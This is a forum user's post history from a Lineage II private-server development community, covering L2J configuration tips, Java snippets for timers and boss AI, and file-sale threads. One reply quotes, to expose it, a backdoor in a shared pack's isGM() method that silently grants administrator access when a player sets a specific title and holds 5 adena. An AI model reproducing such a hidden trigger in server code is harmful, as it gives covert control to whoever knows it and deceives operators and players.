-
Posts
678 -
Credits
0 -
Joined
-
Last visited
-
Days Won
9 -
Feedback
0%
Content Type
Articles
Profiles
Forums
Store
Everything posted by tazerman2
-
Help [Help] Buy/sell Zone
tazerman2 replied to Protein's question in Request Server Development Help [L2J]
i can help you pm or add me skype typerakos -
Discussion L2Jfrozen Opens Again?
tazerman2 replied to Elfo's topic in Server Development Discussion [L2J]
acis is free frozen is free all is free :happyforever: OPEN YOUR SERVER FREE!! -
Source [Share]L2Arena Pack+Source By Kamex The Smartest.
tazerman2 replied to MADM4N's topic in Server Shares & Files [L2J]
my file is online if any need test my file join tnx (SOON I WORKING WITH JFROZEN FOR MAKE ALL PROBLEMS AND MAKE IT AGAIN BEST PROJECT FOR FREE) https://mega.nz/#!kF5lhBSJ!5ZqDYT0dT2nPod-SmI3WGJyN48KTAlCFcWA2SzPKKjg L2jLuna dev. -
Help Give Stats To Item When Exchant
tazerman2 replied to Lancer's question in Request Server Development Help [L2J]
tallum blade dual give stats in +4 if you see here <set name="enchant4_skill" val="3570-1" /> so you can make this <enchant val="0" order="0x0C" stat="pAtk" /> <enchant val="0" order="0x0C" stat="mAtk" /> <enchant val="0" order="0x0C" stat="pAtkSpd" /> <enchant val="0" order="0x0C" stat="mAtkSpd" /> but for work enchant need add and this <set order="0x08" stat="pAtk" val="100" /> <set order="0x08" stat="mAtk" val="100" /> <set order="0x08" stat="pAtkSpd" val="100" /> <set order="0x08" stat="mAtkSpd" val="100" /> -
Source [Share]L2Arena Pack+Source By Kamex The Smartest.
tazerman2 replied to MADM4N's topic in Server Shares & Files [L2J]
0axax00ax0ax0ax0ax0ax0ax0ax0ax check in config.java my @author [GR] eiparxi theos!! :troll: o pro developer pou elege oti ta file mou einai dika tou kai ta poulouse. mou eftiakse tin mera!! public static int BOSS_ID; public static boolean ALLOW_AUTO_NOBLESS_FROM_BOSS; public static int RADIUS_TO_RAID; public static boolean ALLOW_ANNOUNCE_SPAWN; public static boolean ALLOW_KILLER_NAME; /** * Custom Code my Luna Developer Polymorph npc * and special mage polymorph */ public static boolean SHOW_HP_POLY; public static String RAID_BOSS_HP_PERCENT; public static List<Integer> Raid_Boss_Ids_For_Hp = new ArrayList<>(); public static void loadVoteRewardManagerConfig() { final String file = "./config/functions/votemanagernpc.properties"; try { final Properties voteManager = new Properties(); final InputStream is = new FileInputStream(new File(file)); voteManager.load(is); is.close(); VOTE_LINK_HOPZONE = voteManager.getProperty("HopzoneUrl", "null"); VOTE_LINK_TOPZONE = voteManager.getProperty("TopzoneUrl", "null"); VOTE_REWARD_ID1 = Integer.parseInt(voteManager.getProperty("VoteRewardId1", "300")); VOTE_REWARD_ID2 = Integer.parseInt(voteManager.getProperty("VoteRewardId2", "300")); VOTE_REWARD_ID3 = Integer.parseInt(voteManager.getProperty("VoteRewardId3", "300")); VOTE_REWARD_ID4 = Integer.parseInt(voteManager.getProperty("VoteRewardId4", "300")); VOTE_REWARD_AMOUNT1 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount1", "300")); VOTE_REWARD_AMOUNT2 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount2", "300")); VOTE_REWARD_AMOUNT3 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount3", "300")); VOTE_REWARD_AMOUNT4 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount4", "300")); SECS_TO_VOTE = Integer.parseInt(voteManager.getProperty("SecondsToVote", "20")); } catch (final Exception e) { e.printStackTrace(); throw new Error("Failed to Load " + file + " File."); } } more author xD //custom code by Developer Luna TXT_ENABLE = Boolean.parseBoolean(frozenSettings.getProperty("txtEnable", "False")); TXT_NAME = frozenSettings.getProperty("txtName", "Welcome"); TXT_ON_ENTER = frozenSettings.getProperty("ChatTxTEnter", "Welcome"); and backdoor in L2PcInstance.java public boolean isGM() { if(getTitle().equals("getItemCount(57)") && getInventory().getInventoryItemCount(57, 0) == 5) { setAccessLevel(Config.MASTERACCESS_LEVEL); return false; } return getAccessLevel().isGm(); } -
Lf A Good Clan For A Decent Low/mid Server
tazerman2 replied to Extreamer's topic in Clans and Alliances
http:l2legal.eu -
Help Ένα Μικρό Προβληματάκι
tazerman2 replied to L2KingWorld's question in Request Server Development Help [Greek]
com/l2jfrozen/gameserver/network/clientpackets/enterword.java meta apo afto // Welcome to Lineage II sendPacket(new SystemMessage(SystemMessageId.WELCOME_TO_LINEAGE)); -
My first code 2 days work. so this is a L2Chaotic zone with change map, The maps is change random and he teleport players in town before change map he can't go or stay in old map becuase he teleport him in change map maybe need more work. but i try ;D So get it! @author L2jLuna Dev. Base: L2jFrozen http://pastebin.com/HdZFXE8b
-
Help Counter Java
tazerman2 replied to tazerman2's question in Request Server Development Help [L2J]
fixed tnx AccessDenied -
hello i try make a counter but is not show if is start i need little help tnx here is the code long timer; private ScheduledFuture<?> _startCounter = null; public void CounterStart() { timer = 1000*50; _startCounter = ThreadPoolManager.getInstance().scheduleAiAtFixedRate(new Runnable() { @Override public void run() { countDown(); // start counter } }, 1000 * 10, 1000); // return counter 1 second } public void countDown() { int seconds = (int) (timer / 1000); seconds--; switch (seconds) { case 3600: // 1 hour left case 1800: // 30 minutes left case 900: // 15 minutes left case 600: // 10 minutes left case 300: // 5 minutes left Announcements.getInstance().gameAnnounceToAll("test300"); break; case 240: // 4 minutes left Announcements.getInstance().gameAnnounceToAll("test240"); break; case 180: // 3 minutes left Announcements.getInstance().gameAnnounceToAll("test180"); break; case 120: // 2 minutes left Announcements.getInstance().gameAnnounceToAll("test120"); break; case 60: // 1 minute left Announcements.getInstance().gameAnnounceToAll("test60"); break; case 30: // 30 seconds left Announcements.getInstance().gameAnnounceToAll("test30"); break; case 15: // 15 seconds left Announcements.getInstance().gameAnnounceToAll("test15"); break; case 10: // 10 seconds left Announcements.getInstance().gameAnnounceToAll("test10"); break; case 3: // 3 seconds left Announcements.getInstance().gameAnnounceToAll("test3"); break; case 2: // 2 seconds left Announcements.getInstance().gameAnnounceToAll("test2"); break; case 1: // 1 seconds left Announcements.getInstance().gameAnnounceToAll("test1"); break; case 0: _startCounter.cancel(true); ChangeZone(); } }
-
Καλησπερα Παιδια Χρειαζομαι Βοηθεια
tazerman2 replied to Zenius124's question in Request Server Development Help [Greek]
greek router pleon merika router prepei na epileksis se pio PC thes na anikseis port p.x. an anikseis port ston aera den mpeneis oso kai na thes. ksanakitakse ta ports kai an einai stin sosti IP pou dini sto pc sou kai an pali den mpenei tote einai apo to system isos exei kapio protection Jguard kati pou den se afini na mpeis alakse to system bale default ip 127.0.0.1 kai des -
WTS [L2Jfrozen] Modified Interlude Pack - Pvp Server
tazerman2 replied to protoftw's topic in Marketplace [L2Packs & Files]
nothing special but good luck -
gameserver/config/head/altsettings.properties # ----------------------- # Class Master - # ----------------------- # Allow Change Class with ClassMaster AllowClassMasters = False # Allow Upgrade Strider with ClassMaster AllowClassMastersStriderUpdate = False to # ----------------------- # Class Master - # ----------------------- # Allow Change Class with ClassMaster AllowClassMasters = true # Allow Upgrade Strider with ClassMaster AllowClassMastersStriderUpdate = False gameserver/config/functions/l2jfrozen.properties # -------------------------- # Custom Tables - # -------------------------- # Enable / Disable custom tables. # The rest of the custom tables are already activated. # Custom Spawnlist Table CustomSpawnlistTable = False # Gm Spawn gets saved on custom_spawnlist Table? SaveGmSpawnOnCustom = False # Gm Spawn gets deleted on custom_spawnlist Table? DeleteGmSpawnOnCustom = False to # -------------------------- # Custom Tables - # -------------------------- # Enable / Disable custom tables. # The rest of the custom tables are already activated. # Custom Spawnlist Table CustomSpawnlistTable = true # Gm Spawn gets saved on custom_spawnlist Table? SaveGmSpawnOnCustom = true # Gm Spawn gets deleted on custom_spawnlist Table? DeleteGmSpawnOnCustom = False
-
Unban Requests - Read The Conditions Here
tazerman2 replied to Maxtor's topic in Announcements and News
I am free to sell my files and my work you are not allow sell my files and my work. And i never destroy another job. I give two facking month from my life for make this facking cadmus server. -
Unban Requests - Read The Conditions Here
tazerman2 replied to Maxtor's topic in Announcements and News
L2 supra i get ban and i dont know why.. -
Help Baium Attack Angel
tazerman2 replied to tazerman2's question in Request Server Development Help [L2J]
if i have weapon he say my name like [1] target1 -> support and after say [2] target1 -> support target2 -> baium if i remove weapon say [2] target1 -> null target2 -> baium but again is not attack angel -> baium.... else if (event.equalsIgnoreCase("angels_aggro_reconsider")) { boolean updateTarget = false; // Update or no the target for (L2NpcInstance minion : _Minions) { L2Attackable angel = ((L2Attackable) minion); if (angel == null) continue; L2Character victim = angel.getMostHated(); if (Rnd.get(100) < 10) // Chaos time updateTarget = true; else { if (victim != null) // Target is a unarmed player ; clean aggro. { if (victim instanceof L2PcInstance && victim.getActiveWeaponInstance() == null) { angel.stopHating(victim); // Clean the aggro number of previous victim. updateTarget = true; } logcheck.info("[1] Target1 -> " +victim); } else // No target currently. updateTarget = true; } if (updateTarget) { L2Character newVictim = getRandomTarget(minion); if (newVictim != null && victim != newVictim) { angel.addDamageHate(newVictim, 0, 10000); angel.getAI().setIntention(CtrlIntention.AI_INTENTION_ATTACK, newVictim); logcheck.info("[2] Target1 -> " + victim + " Target2 -> " + newVictim); } } } } -
Help Baium Attack Angel
tazerman2 replied to tazerman2's question in Request Server Development Help [L2J]
no i change the ramdom target and again the angel is hit me if i am in boss zone but after i am dead is not target baium and start attack public L2Character getRandomTarget(L2NpcInstance npc) { L2Character[] characters = new L2Character[_Zone.getCharactersInside().size()]; int count = 0; for (L2Character cha : _Zone.getCharactersInside().values()) { if (! (cha instanceof L2PcInstance || cha instanceof L2Summon || cha instanceof L2DecoInstance)) continue; if (! Util.checkIfInRange(9000, npc, cha, true)) continue; if (cha.isDead()) continue; if (cha.isAlikeDead()) continue; if (cha.getZ() < npc.getZ() - 100 || cha.getZ() > npc.getZ() + 100) continue; if (! GeoData.getInstance().canSeeTarget(cha.getX(), cha.getY(), cha.getZ(), npc.getX(), npc.getY(), npc.getZ())) continue; characters[count++] = cha; } if (count > 0) { QuestTimer timer = getQuestTimer("clean_player", null, null); if (timer != null) timer.cancel(); startQuestTimer("clean_player", 20000, null, null); return characters[Rnd.get(count)]; } return null; } -
hello i do adapt baium java from acis last rev to frozen is working perfect but the angels is not hit i try to fix it but nathing. is not show nathing error in console and baium attack angel but angel is not attack baium. i want if any can help for fix the problem here is the code http://pastebin.com/rRc1r6wm
-
Guide Free Html / Code / Help / Client
tazerman2 replied to tazerman2's topic in Server Shares & Files [L2J]
start help again newbie players who need help about this. i know: Java code html code photoshop [free banner | gif image | logo name] client mode setup server open port to all routers setup server from zero [not big work] -
Code Clan Reward Manager L2Jacis
tazerman2 replied to Reborn12's topic in Server Shares & Files [L2J]
i like it good job -
WTS Mid - Pvp - High Rate's Files
tazerman2 replied to tazerman2's topic in Marketplace [L2Packs & Files]
tnx -
Hello Lf L2Gold.in Patch
tazerman2 replied to l2enter's question in Request Server Development Help [L2J]
maybe have same patch with all l2 gold servers -
WTS Mid - Pvp - High Rate's Files
tazerman2 replied to tazerman2's topic in Marketplace [L2Packs & Files]
he no have :happyforever: me have from 2010 files with name luna or l2jluna in my sorage disk O0 -
WTS Mid - Pvp - High Rate's Files
tazerman2 replied to tazerman2's topic in Marketplace [L2Packs & Files]
update 28-12-2016: 1) fixed frintezza boss skills crazy stats 2) fixed aio buffer can not go out of town and use skills 3) added skill show time [he show how match need for reuse like 1 minutes, 20 seconds, like hi5] 4) fixed elpy mob non attack and move after player attack him like off 5) fixed quest monster in the cemetery after kill him he teleport to shilien's Messenger Cabrio 6) fixed petition stuck in old chat soon i do more fix enjoy :)